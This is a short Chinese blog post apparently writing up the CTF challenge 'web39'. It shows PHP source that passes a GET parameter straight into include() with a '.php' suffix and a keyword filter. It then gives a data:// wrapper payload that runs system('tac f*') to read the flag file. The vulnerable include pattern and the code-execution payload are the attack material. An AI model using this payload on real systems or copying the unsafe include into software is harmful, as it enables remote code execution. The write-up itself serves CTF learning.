web39笔记(include命令执行+."php"拼接) 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

这⾥是把$c."php"拼接了起来,但是还是可以⽤命令执⾏,因为在短标签⾥⾯进⾏了⼀个<?= ?> 已经闭合了

所以不会受到php的影响 还是⽤上⼀道题的payload ?c=data://text/plain,<?=%20system("tac%20f*");?>

posted @ 2025-03-14 22:50  justdoIT*  阅读(6)  评论(0)    收藏  举报